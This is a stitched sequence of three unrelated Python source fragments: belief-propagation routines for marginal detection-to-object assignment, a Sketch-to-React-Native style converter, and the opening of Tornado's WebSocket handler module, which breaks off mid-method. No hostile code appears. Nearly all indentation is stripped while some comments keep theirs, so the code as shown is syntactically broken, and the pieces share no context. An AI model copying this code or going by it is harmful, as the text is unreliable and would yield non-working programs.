assert exists_logits.shape == (num_objects,)
dtype = exists_logits.dtype
device = exists_logits.device
exists_probs = torch.zeros(
2, num_objects, dtype=dtype, device=device
) # [not exist, exist]
assign_probs = torch.zeros(
num_detections, num_objects + 1, dtype=dtype, device=device
)
for assign in itertools.product(range(num_objects + 1), repeat=num_detections):
assign_part = sum(
assign_logits[j, i] for j, i in enumerate(assign) if i < num_objects
)
for exists in itertools.product(
*[[1] if i in assign else [0, 1] for i in range(num_objects)]
):
exists_part = sum(exists_logits[i] for i, e in enumerate(exists) if e)
prob = _exp(exists_part + assign_part)
for i, e in enumerate(exists):
exists_probs[e, i] += prob
for j, i in enumerate(assign):
assign_probs[j, i] += prob
# Convert from probs to logits.
exists = exists_probs.log()
assign = assign_probs.log()
exists = exists[1] - exists[0]
assign = assign[:, :-1] - assign[:, -1:]
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_bp(exists_logits, assign_logits, bp_iters):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1].
See :class:`MarginalAssignment` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
"""
message_e_to_a = torch.zeros_like(assign_logits)
message_a_to_e = torch.zeros_like(assign_logits)
for i in range(bp_iters):
message_e_to_a = (
-(message_a_to_e - message_a_to_e.sum(0, True) - exists_logits)
.exp()
.log1p()
)
joint = (assign_logits + message_e_to_a).exp()
message_a_to_e = (
(assign_logits - torch.log1p(joint.sum(1, True) - joint)).exp().log1p()
)
warn_if_nan(message_e_to_a, "message_e_to_a iter {}".format(i))
warn_if_nan(message_a_to_e, "message_a_to_e iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + message_a_to_e.sum(0)
assign = assign_logits + message_e_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_sparse_bp(
num_objects, num_detections, edges, exists_logits, assign_logits, bp_iters
):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1].
See :class:`MarginalAssignmentSparse` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
"""
exists_factor = exists_logits[edges[1]]
def sparse_sum(x, dim, keepdim=False):
assert dim in (0, 1)
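        # dim=0 sums the per-edge values over detections, yielding one entry per
        # object (grouped by edges[1]); dim=1 sums over objects, yielding one
        # entry per detection (grouped by edges[0]). With keepdim=True the
        # grouped sums are gathered back onto the edges, mirroring the dense
        # sum(dim, keepdim=True) used in compute_marginals_bp.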
x = torch.zeros(
[num_objects, num_detections][dim], dtype=x.dtype, device=x.device
).scatter_add_(0, edges[1 - dim], x)
if keepdim:
x = x[edges[1 - dim]]
return x
message_e_to_a = torch.zeros_like(assign_logits)
message_a_to_e = torch.zeros_like(assign_logits)
for i in range(bp_iters):
message_e_to_a = (
-(message_a_to_e - sparse_sum(message_a_to_e, 0, True) - exists_factor)
.exp()
.log1p()
)
joint = (assign_logits + message_e_to_a).exp()
message_a_to_e = (
(assign_logits - torch.log1p(sparse_sum(joint, 1, True) - joint))
.exp()
.log1p()
)
warn_if_nan(message_e_to_a, "message_e_to_a iter {}".format(i))
warn_if_nan(message_a_to_e, "message_a_to_e iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + sparse_sum(message_a_to_e, 0)
assign = assign_logits + message_e_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_persistent(exists_logits, assign_logits):
"""
This implements exact inference of pairwise marginals via
enumeration. This is very expensive and is only useful for testing.
See :class:`MarginalAssignmentPersistent` for args and problem description.
"""
num_frames, num_detections, num_objects = assign_logits.shape
assert exists_logits.shape == (num_objects,)
dtype = exists_logits.dtype
device = exists_logits.device
total = 0
exists_probs = torch.zeros(num_objects, dtype=dtype, device=device)
assign_probs = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
for exists in itertools.product([0, 1], repeat=num_objects):
exists = [i for i, e in enumerate(exists) if e]
exists_part = _exp(sum(exists_logits[i] for i in exists))
        # The remaining variables are conditionally independent given exists.
assign_parts = []
assign_sums = []
for t in range(num_frames):
assign_map = {}
for n in range(1 + min(len(exists), num_detections)):
for objects in itertools.combinations(exists, n):
for detections in itertools.permutations(range(num_detections), n):
assign = tuple(zip(objects, detections))
assign_map[assign] = _exp(
sum(assign_logits[t, j, i] for i, j in assign)
)
assign_parts.append(assign_map)
assign_sums.append(sum(assign_map.values()))
prob = exists_part * _product(assign_sums)
total += prob
for i in exists:
exists_probs[i] += prob
for t in range(num_frames):
other_part = exists_part * _product(assign_sums[:t] + assign_sums[t + 1 :])
for assign, assign_part in assign_parts[t].items():
prob = other_part * assign_part
for i, j in assign:
assign_probs[t, j, i] += prob
# Convert from probs to logits.
exists = exists_probs.log() - (total - exists_probs).log()
assign = assign_probs.log() - (total - assign_probs.sum(-1, True)).log()
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
def compute_marginals_persistent_bp(
exists_logits, assign_logits, bp_iters, bp_momentum=0.5
):
"""
This implements approximate inference of pairwise marginals via
loopy belief propagation, adapting the approach of [1], [2].
See :class:`MarginalAssignmentPersistent` for args and problem description.
[1] Jason L. Williams, Roslyn A. Lau (2014)
Approximate evaluation of marginal association probabilities with
belief propagation
https://arxiv.org/abs/1209.6299
[2] Ryan Turner, Steven Bottone, Bhargav Avasarala (2014)
A Complete Variational Tracker
https://papers.nips.cc/paper/5572-a-complete-variational-tracker.pdf
"""
# This implements forward-backward message passing among three sets of variables:
#
# a[t,j] ~ Categorical(num_objects + 1), detection -> object assignment
# b[t,i] ~ Categorical(num_detections + 1), object -> detection assignment
    # e[i] ~ Bernoulli, whether each object exists
#
# Only assign = a and exists = e are returned.
assert 0 <= bp_momentum < 1, bp_momentum
old, new = bp_momentum, 1 - bp_momentum
num_frames, num_detections, num_objects = assign_logits.shape
dtype = assign_logits.dtype
device = assign_logits.device
message_b_to_a = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
message_a_to_b = torch.zeros(
num_frames, num_detections, num_objects, dtype=dtype, device=device
)
message_b_to_e = torch.zeros(num_frames, num_objects, dtype=dtype, device=device)
message_e_to_b = torch.zeros(num_frames, num_objects, dtype=dtype, device=device)
for i in range(bp_iters):
odds_a = (assign_logits + message_b_to_a).exp()
message_a_to_b = old * message_a_to_b + new * (
assign_logits - (odds_a.sum(2, True) - odds_a).log1p()
)
message_b_to_e = (
old * message_b_to_e + new * message_a_to_b.exp().sum(1).log1p()
)
message_e_to_b = old * message_e_to_b + new * (
exists_logits + message_b_to_e.sum(0) - message_b_to_e
)
odds_b = message_a_to_b.exp()
message_b_to_a = (
old * message_b_to_a
- new
* (
(-message_e_to_b).exp().unsqueeze(1)
+ (1 + odds_b.sum(1, True) - odds_b)
).log()
)
warn_if_nan(message_a_to_b, "message_a_to_b iter {}".format(i))
warn_if_nan(message_b_to_e, "message_b_to_e iter {}".format(i))
warn_if_nan(message_e_to_b, "message_e_to_b iter {}".format(i))
warn_if_nan(message_b_to_a, "message_b_to_a iter {}".format(i))
# Convert from probs to logits.
exists = exists_logits + message_b_to_e.sum(0)
assign = assign_logits + message_b_to_a
warn_if_nan(exists, "exists")
warn_if_nan(assign, "assign")
return exists, assign
|
|
from sketch_components.engines.base.converters import BaseSketchStyle, \
SketchColor
from sketch_components.engines.react.base import converters
from sketch_components.utils import update_existing, combine_styles, \
remove_existing, hyphen_to_small_camel, \
transform_dict_keys
from .components.button import Button
from .components.component import Component
from .components.custom_progress_bar import CustomProgressBar
from .components.custom_tab_bar_header import CustomTabBarHeader
from .components.empty import Empty
from .components.image import Image
from .components.listview import ListView
from .components.listviewitem import ListViewItem
from .components.margin_layer import MarginLayer
from .components.modal import Modal
from .components.padding_layer import PaddingLayer
from .components.picker import Picker
from .components.progress_bar_android import ProgressBarAndroid
from .components.scrollview import ScrollView
from .components.slider import Slider
from .components.statusbar import StatusBar
from .components.styledcomponent import StyledComponent
from .components.svgcomponent import SvgComponent
from .components.switch import Switch
from .components.text import Text
from .components.textinput import TextInput
from .components.toolbar import ToolbarAndroid
from .components.touchable import Touchable
from .components.view import View
PLUGIN_ID = "co.ibhubs.SketchComponents"
class ComponentProperties(converters.ComponentProperties):
content_prop = 'content'
def get_react_native_props(self):
return self.get_react_props(self.react_native)
def get_react_native_component_content(self):
return self.get_react_component_content(self.react_native)
def get_react_native_component(self):
return self.get_react_component(self.react_native)
def get_react_native_flex_styles(self):
return self.get_react_flex_styles(self.react_native)
def get_react_native_resizing_constraints(self):
return self.get_react_resizing_constraints(self.react_native)
def get_react_native_absolute_positioning_constraints(self):
return self.get_react_absolute_positioning_constraints(
self.react_native)
class SketchFrame(converters.SketchFrame):
pass
class SketchFont(converters.SketchFont):
def get_css_styles(self):
mapping = super(self.__class__, self).get_css_empty_styles()
for key in mapping.keys():
mapping[key] = hyphen_to_small_camel(key)
return transform_dict_keys(
super(self.__class__, self).get_css_styles(), mapping)
def get_css_empty_styles(self):
return map(hyphen_to_small_camel,
super(self.__class__, self).get_css_empty_styles().keys())
class SketchParagraphStyle(converters.SketchParagraphStyle):
pass
class SketchTextStyle(converters.SketchTextStyle):
font_class = SketchFont
paragraph_class = SketchParagraphStyle
class SketchGraphicsContextSettings(converters.SketchGraphicsContextSettings):
pass
class SketchGradientStop(converters.SketchGradientStop):
pass
class SketchGradient(converters.SketchGradient):
pass
class SketchFill(converters.SketchFill):
graphics_context_class = SketchGraphicsContextSettings
gradient_class = SketchGradient
class SketchBorder(converters.SketchBorder):
gradient_class = SketchGradient
graphics_context_class = SketchGraphicsContextSettings
class SketchBorderOptions(converters.SketchBorderOptions):
pass
# TODO: Implement method to get inner shadow styles.
class SketchShadow(converters.SketchShadow):
graphic_context_class = SketchGraphicsContextSettings
def get_css_shadow_styles(self):
styles = {
# Android-only style
'elevation': None,
# iOS-only styles
'shadowColor': None,
'shadowOffset': dict(),
'shadowOpacity': None,
'shadowRadius': None,
}
if self.isEnabled == 0:
return styles
if self.offsetX is not None:
styles['shadowOffset']['width'] = self.offsetX
if self.offsetY is not None:
styles['shadowOffset']['height'] = self.offsetY
if self.color is not None:
styles['shadowColor'] = self.color.rgba()
if self.blurRadius is not None:
styles['shadowRadius'] = self.blurRadius
if (self.contextSettings is not None and
self.contextSettings.opacity is not None):
styles['shadowOpacity'] = self.contextSettings.opacity
if self.offsetY is not None and self.blurRadius is not None:
            # This is just an approximation; there is no straightforward mapping,
            # since elevation only produces a limited set of possible shadows.
styles['elevation'] = int((self.offsetY + self.blurRadius) / 2)
return styles
def get_css_text_shadow_styles(self):
styles = {
'textShadowColor': None,
'textShadowOffset': dict(),
'textShadowRadius': None,
}
if self.offsetX is not None:
styles['textShadowOffset']['width'] = self.offsetX
if self.offsetY is not None:
styles['textShadowOffset']['height'] = self.offsetY
if self.color is not None:
styles['textShadowColor'] = self.color.rgba()
if self.blurRadius is not None:
styles['textShadowRadius'] = self.blurRadius
return styles
class SketchStyleBlur(converters.SketchStyleBlur):
pass
class SketchStyleReflection(converters.SketchStyleReflection):
pass
class SketchStyleColorControls(converters.SketchStyleColorControls):
pass
class SketchStyle(BaseSketchStyle):
fill_class = SketchFill
shadow_class = SketchShadow
text_style_class = SketchTextStyle
border_class = SketchBorder
border_options_class = SketchBorderOptions
graphic_context_class = SketchGraphicsContextSettings
blur_class = SketchStyleBlur
reflection_class = SketchStyleReflection
color_controls_class = SketchStyleColorControls
def get_css_styles(self):
styles = {
}
return styles
def get_css_view_styles(self):
view_styles = {
'backfaceVisibility': None,
'backgroundColor': None,
'borderBottomColor': None,
'borderBottomLeftRadius': None,
'borderBottomRightRadius': None,
'borderBottomWidth': None,
'borderColor': None,
'borderLeftColor': None,
'borderLeftWidth': None,
'borderRadius': None,
'borderRightColor': None,
'borderRightWidth': None,
'borderStyle': None,
'borderTopColor': None,
'borderTopLeftRadius': None,
'borderTopRightRadius': None,
'borderTopWidth': None,
'borderWidth': None,
'opacity': None,
'overflow': None,
'elevation': None,
}
for fill in self.fills:
if fill.isEnabled:
update_existing(view_styles, fill.get_css_styles())
return view_styles
def get_css_image_styles(self):
image_styles = {
'backfaceVisibility': None,
'backgroundColor': None,
'borderBottomLeftRadius': None,
'borderBottomRightRadius': None,
'borderColor': None,
'borderRadius': None,
'borderTopLeftRadius': None,
'borderTopRightRadius': None,
'borderWidth': None,
'opacity': None,
'overflow': None,
'resizeMode': None,
'tintColor': None,
'overlayColor': None,
}
return image_styles
def get_css_text_styles(self):
text_styles = {
'color': None,
'fontFamily': None,
'fontSize': None,
'fontStyle': None,
'fontWeight': None,
'lineHeight': None,
'textAlign': None,
'textDecorationLine': None,
'textShadowColor': None,
'textShadowOffset': None,
'textShadowRadius': None,
'includeFontPadding': None,
'textAlignVertical': None,
'fontVariant': None,
'letterSpacing': None,
'textDecorationColor': None,
'textDecorationStyle': None,
'writingDirection': None,
}
if self.textStyle:
update_existing(text_styles, self.textStyle.get_css_styles())
if self.has_fills():
for fill in self.fills:
if fill.isEnabled:
update_existing(text_styles,
{'color': fill.get_css_fill_color()})
if self.contextSettings:
opacity = self.contextSettings.opacity
if (opacity not in [0, 1, None, 0.0, 1.0] and
text_styles.get('color')):
color = SketchColor({'color': text_styles.get('color')})
color.a = round(opacity, 2)
text_styles['color'] = color.rgba()
return text_styles
def get_border_styles(self):
border_styles = {
'borderRadius': None,
'borderWidth': None,
'borderColor': None,
'borderStyle': None
}
enabled_borders = [border for border in self.borders if
border.isEnabled]
if enabled_borders:
border = enabled_borders[0]
update_existing(border_styles, border.get_css_border_styles())
dash = self.borderOptions.get_dash_pattern()
if dash and border_styles['borderWidth'] is not None:
if dash[0] > border_styles['borderWidth']:
update_existing(border_styles, {'borderStyle': 'dashed'})
else:
update_existing(border_styles, {'borderStyle': 'dotted'})
return border_styles
class SketchLayer(converters.SketchLayer):
style_class = SketchStyle
frame_class = SketchFrame
component_class = ComponentProperties
def has_fills(self):
return self.style.has_fills()
def get_dimensions(self):
return self.frame.get_css_dimension_styles()
def get_dimensions_width(self):
dimensions = self.get_dimensions()
return {'width': dimensions.get('width', None)}
def get_dimensions_height(self):
dimensions = self.get_dimensions()
return {'height': dimensions.get('height', None)}
def get_text_content(self):
if self.is_text_layer():
content = self.attributedString.get_content() or self.name
else:
content = self.name
if content and type(content) == bytes:
return content.decode('utf-8')
return content
def get_react_component(self, parent=None, pass_styles=None):
if self.component and self.component.get_react_native_component():
component_tag = self.component.get_react_native_component()
if component_tag == "Component":
return Component.create_component(self, parent=parent)
elif component_tag == "Button":
return Button.create_component(self, parent=parent)
elif component_tag == "Image":
return Image.create_component(self, parent=parent)
elif component_tag == "Text":
if self._class == 'MSTextLayer':
return Text.create_component(self, parent=parent)
elif component_tag == "TextInput":
return TextInput.create_component(self, parent=parent)
elif component_tag == "View":
return View.create_component(self, parent=parent)
elif component_tag == "StatusBar":
return StatusBar.create_component(self, parent=parent)
elif component_tag == "ListView":
return ListView.create_component(self, parent=parent)
elif component_tag == "ListViewItem":
return ListViewItem.create_component(self, parent=parent)
elif component_tag == "ListViewItemSeparator":
return Component.create_component(self, parent=parent)
elif component_tag == "Modal":
return Modal.create_component(self, parent=parent)
elif component_tag == "Picker":
return Picker.create_component(self, parent=parent)
elif component_tag == "ProgressBarAndroid":
return ProgressBarAndroid.create_component(self, parent=parent)
elif component_tag == "CustomProgressBar":
return CustomProgressBar.create_component(self, parent=parent)
elif component_tag == "ScrollView":
return ScrollView.create_component(self, parent=parent)
elif component_tag == "Slider":
return Slider.create_component(self, parent=parent)
elif component_tag == "Switch":
return Switch.create_component(self, parent=parent)
elif component_tag == "Touchable":
return Touchable.create_component(self, parent=parent)
elif component_tag == "ToolbarAndroid":
return ToolbarAndroid.create_component(self, parent=parent)
elif component_tag == "Styled Component":
return StyledComponent.create_component(self, parent=parent)
elif component_tag == "SVGImage":
return SvgComponent.create_component(self, parent=parent)
elif component_tag == "PaddingLayer":
return PaddingLayer.create_component(self, parent=parent)
elif component_tag == "MarginLayer":
return MarginLayer.create_component(self, parent=parent)
elif component_tag == "CustomTabBarHeader":
return CustomTabBarHeader.create_component(self, parent=parent)
elif component_tag == "Dummy":
return CustomTabBarHeader.create_component(self, parent=parent)
else:
if (self.is_rectangle_shape() or self.is_oval_shape() or
self.is_shape_group()):
return Empty.create_component(self, parent=parent,
pass_styles=True)
else:
return Empty.create_component(self, parent=parent,
pass_styles=pass_styles)
elif self.is_artboard():
return Component.create_component(self)
elif (self.is_rectangle_shape() or self.is_oval_shape() or
self.is_shape_group()):
return Empty.create_component(self, parent=parent,
pass_styles=True)
else:
return Empty.create_component(self, parent=parent,
pass_styles=pass_styles)
def get_unimplemented_component(self, parent=None):
component = Empty(parent=parent)
component.set_position(self.get_position())
component.update_styles(self.get_css_view_styles())
return component
def get_child_component_layers(self):
components = []
if self.layers:
for layer in self.layers:
component = layer.component.get_react_native_component()
if component:
components.append(layer)
return components
def get_css_text_styles(self):
return combine_styles(self.get_css_view_styles(),
self.style.get_css_text_styles())
def get_css_view_styles(self):
if self.style is not None:
styles = self.style.get_css_view_styles()
            # Remove fill styles when the layer is a group or a text layer.
if (self.is_layer_group() or
self.is_text_layer()) and self.style.fills:
for fill in self.style.fills:
remove_existing(styles, fill.get_css_styles())
if not self.is_text_layer():
if self.style.shadows:
for shadow in self.style.shadows:
if shadow.isEnabled:
styles = combine_styles(
styles,
shadow.get_css_shadow_styles()
)
styles = combine_styles(styles, self.style.get_border_styles())
elif self.is_text_layer() and self.style.shadows:
for shadow in self.style.shadows:
if shadow.isEnabled:
styles = combine_styles(
styles,
shadow.get_css_text_shadow_styles()
)
else:
styles = dict()
styles = combine_styles(styles, self.get_css_flex_styles())
styles = combine_styles(styles, self.get_css_border_styles())
# if self.frame is not None:
# styles = combine_styles(styles, self.frame.get_css_styles())
return styles
def get_css_flex_styles(self):
flex_styles = {
'alignItems': None,
'alignSelf': None,
'borderBottomWidth': None,
'borderLeftWidth': None,
'borderRightWidth': None,
'borderTopWidth': None,
'borderWidth': None,
'bottom': None,
'flex': None,
'flexDirection': None,
'flexWrap': None,
'height': None,
'justifyContent': None,
'left': None,
'margin': None,
'marginBottom': None,
'marginHorizontal': None,
'marginLeft': None,
'marginRight': None,
'marginTop': None,
'marginVertical': None,
'maxHeight': None,
'maxWidth': None,
'minHeight': None,
'minWidth': None,
'padding': None,
'paddingBottomStyle': None,
'paddingHorizontal': None,
'paddingLeftStyle': None,
'paddingRightStyle': None,
'paddingTopStyle': None,
'paddingVertical': None,
'position': None,
'right': None,
'top': None,
'width': None,
'zIndex': None,
'flexGrow': None,
'flexShrink': None
}
if self.component and self.component.get_react_native_flex_styles():
update_existing(flex_styles,
self.component.get_react_native_flex_styles())
# If fixed width and height is set on the sketch layer,
# CSS styles corresponding to those will be applied.
update_existing(flex_styles, self.get_css_resizing_constraints())
# elif self.anima is not None:
# update_existing(flex_styles, self.anima.get_css_styles())
if flex_styles.get('position') == 'absolute':
if self.frame is not None:
update_existing(flex_styles, self.get_css_position_styles())
return flex_styles
def get_fill_styles(self):
fill_styles = []
if self.fills:
for fill in self.fills:
fill_styles.append(fill.get_css_styles())
if self.style and self.style.fills:
for fill in self.style.fills:
fill_styles.append(fill.get_css_styles())
return fill_styles
def get_css_resizing_constraints(self):
# These should be used if Sketch DisplayConstraints are used.
# top, height, bottom, left, width, right = 32, 16, 8, 4, 2, 1
# full = 63
constraints = dict()
if self.textBehaviour == 0:
return constraints
if not self.component:
return constraints
native_constraints = \
self.component.get_react_native_resizing_constraints()
fixed_width, fixed_height = native_constraints[:2]
min_width, min_height, max_width, max_height = native_constraints[2:]
dimensions = self.get_dimensions()
width = dimensions['width']
height = dimensions['height']
if fixed_width:
constraints.update({'width': width})
if fixed_height:
constraints.update({'height': height})
if min_width:
constraints.update({'minWidth': width})
if min_height:
constraints.update({'minHeight': height})
if max_width:
constraints.update({'maxWidth': width})
if max_height:
constraints.update({'maxHeight': height})
return constraints
def get_css_position_styles(self):
styles = dict()
if not self.component:
return styles
left, right, top, bottom = \
self.component.get_react_native_absolute_positioning_constraints()
if left:
styles['left'] = self.frame.x
if top:
styles['top'] = self.frame.y
if right:
styles['right'] = (self.parent.frame.width - self.frame.x -
self.frame.width)
if bottom:
styles['bottom'] = (self.parent.frame.height - self.frame.y -
self.frame.height)
return styles
def is_only_child_shape_group(self):
if self.parent is None:
return False
if self.is_shape_group():
for layer in self.parent.layers:
if layer != self and layer.is_shape_group():
return False
return True
return False
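# --- Hedged usage sketch (not part of the module above) ---
# A minimal, self-contained illustration of the Android "elevation" approximation
# used by SketchShadow.get_css_shadow_styles(); the sample numbers are made up and
# the helper name is hypothetical.
def _approx_elevation_example(offset_y, blur_radius):
    """Rough Sketch drop-shadow -> React Native elevation mapping."""
    return int((offset_y + blur_radius) / 2)
assert _approx_elevation_example(4, 8) == 6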
|
|
"""Implementation of the WebSocket protocol.
`WebSockets <http://dev.w3.org/html5/websockets/>`_ allow for bidirectional
communication between the browser and server.
WebSockets are supported in the current versions of all major browsers,
although older versions that do not support WebSockets are still in use
(refer to http://caniuse.com/websockets for details).
This module implements the final version of the WebSocket protocol as
defined in `RFC 6455 <http://tools.ietf.org/html/rfc6455>`_. Certain
browser versions (notably Safari 5.x) implemented an earlier draft of
the protocol (known as "draft 76") and are not compatible with this module.
.. versionchanged:: 4.0
Removed support for the draft 76 protocol version.
"""
from __future__ import absolute_import, division, print_function, with_statement
# Author: Jacob Kristhammar, 2010
import base64
import collections
import hashlib
import os
import struct
import tornado.escape
import tornado.web
import zlib
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str, to_unicode
from tornado import httpclient, httputil
from tornado.ioloop import IOLoop
from tornado.iostream import StreamClosedError
from tornado.log import gen_log, app_log
from tornado import simple_httpclient
from tornado.tcpclient import TCPClient
from tornado.util import _websocket_mask
try:
    from urllib.parse import urlparse  # py3
except ImportError:
    from urlparse import urlparse  # py2
try:
xrange # py2
except NameError:
xrange = range # py3
class WebSocketError(Exception):
pass
class WebSocketClosedError(WebSocketError):
"""Raised by operations on a closed connection.
.. versionadded:: 3.2
"""
pass
class WebSocketHandler(tornado.web.RequestHandler):
"""Subclass this class to create a basic WebSocket handler.
Override `on_message` to handle incoming messages, and use
`write_message` to send messages to the client. You can also
override `open` and `on_close` to handle opened and closed
connections.
See http://dev.w3.org/html5/websockets/ for details on the
JavaScript interface. The protocol is specified at
http://tools.ietf.org/html/rfc6455.
    Here is an example WebSocket handler that echoes all received messages
    back to the client:
.. testcode::
class EchoWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
print("WebSocket opened")
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print("WebSocket closed")
.. testoutput::
:hide:
WebSockets are not standard HTTP connections. The "handshake" is
HTTP, but after the handshake, the protocol is
message-based. Consequently, most of the Tornado HTTP facilities
are not available in handlers of this type. The only communication
methods available to you are `write_message()`, `ping()`, and
    `close()`. Likewise, your request handler class should implement the
    `open()` method rather than ``get()`` or ``post()``.
If you map the handler above to ``/websocket`` in your application, you can
invoke it in JavaScript with::
var ws = new WebSocket("ws://localhost:8888/websocket");
ws.onopen = function() {
ws.send("Hello, world");
};
ws.onmessage = function (evt) {
alert(evt.data);
};
This script pops up an alert box that says "You said: Hello, world".
Web browsers allow any site to open a websocket connection to any other,
instead of using the same-origin policy that governs other network
access from javascript. This can be surprising and is a potential
security hole, so since Tornado 4.0 `WebSocketHandler` requires
applications that wish to receive cross-origin websockets to opt in
by overriding the `~WebSocketHandler.check_origin` method (see that
method's docs for details). Failure to do so is the most likely
cause of 403 errors when making a websocket connection.
When using a secure websocket connection (``wss://``) with a self-signed
certificate, the connection from a browser may fail because it wants
to show the "accept this certificate" dialog but has nowhere to show it.
You must first visit a regular HTML page using the same certificate
to accept it before the websocket connection will succeed.
"""
def __init__(self, application, request, **kwargs):
super(WebSocketHandler, self).__init__(application, request, **kwargs)
self.ws_connection = None
self.close_code = None
self.close_reason = None
self.stream = None
self._on_close_called = False
@tornado.web.asynchronous
def get(self, *args, **kwargs):
self.open_args = args
self.open_kwargs = kwargs
# Upgrade header should be present and should be equal to WebSocket
if self.request.headers.get("Upgrade", "").lower() != 'websocket':
self.set_status(400)
log_msg = "Can \"Upgrade\" only to \"WebSocket\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Connection header should be upgrade.
# Some proxy servers/load balancers
# might mess with it.
headers = self.request.headers
connection = map(lambda s: s.strip().lower(),
headers.get("Connection", "").split(","))
if 'upgrade' not in connection:
self.set_status(400)
log_msg = "\"Connection\" must be \"Upgrade\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Handle WebSocket Origin naming convention differences
# The difference between version 8 and 13 is that in 8 the
# client sends a "Sec-Websocket-Origin" header and in 13 it's
# simply "Origin".
if "Origin" in self.request.headers:
origin = self.request.headers.get("Origin")
else:
origin = self.request.headers.get("Sec-Websocket-Origin", None)
# If there was an origin header, check to make sure it matches
# according to check_origin. When the origin is None, we assume it
# did not come from a browser and that it can be passed on.
if origin is not None and not self.check_origin(origin):
self.set_status(403)
log_msg = "Cross origin websockets not allowed"
self.finish(log_msg)
gen_log.debug(log_msg)
return
self.stream = self.request.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
self.ws_connection = self.get_websocket_protocol()
if self.ws_connection:
self.ws_connection.accept_connection()
else:
if not self.stream.closed():
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 426 Upgrade Required\r\n"
"Sec-WebSocket-Version: 7, 8, 13\r\n\r\n"))
self.stream.close()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket.
The message may be either a string or a dict (which will be
encoded as json). If the ``binary`` argument is false, the
message will be sent as utf8; in binary mode any byte string
is allowed.
If the connection is already closed, raises `WebSocketClosedError`.
.. versionchanged:: 3.2
`WebSocketClosedError` was added (previously a closed connection
would raise an `AttributeError`)
.. versionchanged:: 4.3
Returns a `.Future` which can be used for flow control.
"""
if self.ws_connection is None:
raise WebSocketClosedError()
if isinstance(message, dict):
message = tornado.escape.json_encode(message)
return self.ws_connection.write_message(message, binary=binary)
def select_subprotocol(self, subprotocols):
"""Invoked when a new WebSocket requests specific subprotocols.
``subprotocols`` is a list of strings identifying the
subprotocols proposed by the client. This method may be
overridden to return one of those strings to select it, or
``None`` to not select a subprotocol. Failure to select a
subprotocol does not automatically abort the connection,
although clients may close the connection if none of their
proposed subprotocols was selected.
"""
return None
def get_compression_options(self):
"""Override to return compression options for the connection.
If this method returns None (the default), compression will
be disabled. If it returns a dict (even an empty one), it
will be enabled. The contents of the dict may be used to
control the memory and CPU usage of the compression,
but no such options are currently implemented.
.. versionadded:: 4.1
"""
return None
def open(self, *args, **kwargs):
"""Invoked when a new WebSocket is opened.
The arguments to `open` are extracted from the `tornado.web.URLSpec`
regular expression, just like the arguments to
`tornado.web.RequestHandler.get`.
"""
pass
def on_message(self, message):
"""Handle incoming messages on the WebSocket
This method must be overridden.
"""
raise NotImplementedError
def ping(self, data):
"""Send ping frame to the remote end."""
if self.ws_connection is None:
raise WebSocketClosedError()
self.ws_connection.write_ping(data)
def on_pong(self, data):
"""Invoked when the response to a ping frame is received."""
pass
def on_close(self):
"""Invoked when the WebSocket is closed.
If the connection was closed cleanly and a status code or reason
phrase was supplied, these values will be available as the attributes
``self.close_code`` and ``self.close_reason``.
.. versionchanged:: 4.0
Added ``close_code`` and ``close_reason`` attributes.
"""
pass
def close(self, code=None, reason=None):
"""Closes this Web Socket.
Once the close handshake is successful the socket will be closed.
``code`` may be a numeric status code, taken from the values
defined in `RFC 6455 section 7.4.1
<https://tools.ietf.org/html/rfc6455#section-7.4.1>`_.
``reason`` may be a textual message about why the connection is
closing. These values are made available to the client, but are
not otherwise interpreted by the websocket protocol.
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.ws_connection:
self.ws_connection.close(code, reason)
self.ws_connection = None
def check_origin(self, origin):
"""Override to enable support for allowing alternate origins.
The ``origin`` argument is the value of the ``Origin`` HTTP
header, the url responsible for initiating this request. This
method is not called for clients that do not send this header;
such requests are always allowed (because all browsers that
implement WebSockets support this header, and non-browser
clients do not have the same cross-site security concerns).
Should return True to accept the request or False to reject it.
By default, rejects all requests with an origin on a host other
than this one.
This is a security protection against cross site scripting attacks on
browsers, since WebSockets are allowed to bypass the usual same-origin
policies and don't use CORS headers.
To accept all cross-origin traffic (which was the default prior to
Tornado 4.0), simply override this method to always return true::
def check_origin(self, origin):
return True
To allow connections from any subdomain of your site, you might
do something like::
def check_origin(self, origin):
parsed_origin = urllib.parse.urlparse(origin)
return parsed_origin.netloc.endswith(".mydomain.com")
.. versionadded:: 4.0
"""
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = self.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def set_nodelay(self, value):
"""Set the no-delay flag for this stream.
By default, small messages may be delayed and/or combined to minimize
the number of packets sent. This can sometimes cause 200-500ms delays
due to the interaction between Nagle's algorithm and TCP delayed
ACKs. To reduce this delay (at the expense of possibly increasing
bandwidth usage), call ``self.set_nodelay(True)`` once the websocket
connection is established.
See `.BaseIOStream.set_nodelay` for additional details.
.. versionadded:: 3.1
"""
self.stream.set_nodelay(value)
def on_connection_close(self):
if self.ws_connection:
self.ws_connection.on_connection_close()
self.ws_connection = None
if not self._on_close_called:
self._on_close_called = True
self.on_close()
def send_error(self, *args, **kwargs):
if self.stream is None:
super(WebSocketHandler, self).send_error(*args, **kwargs)
else:
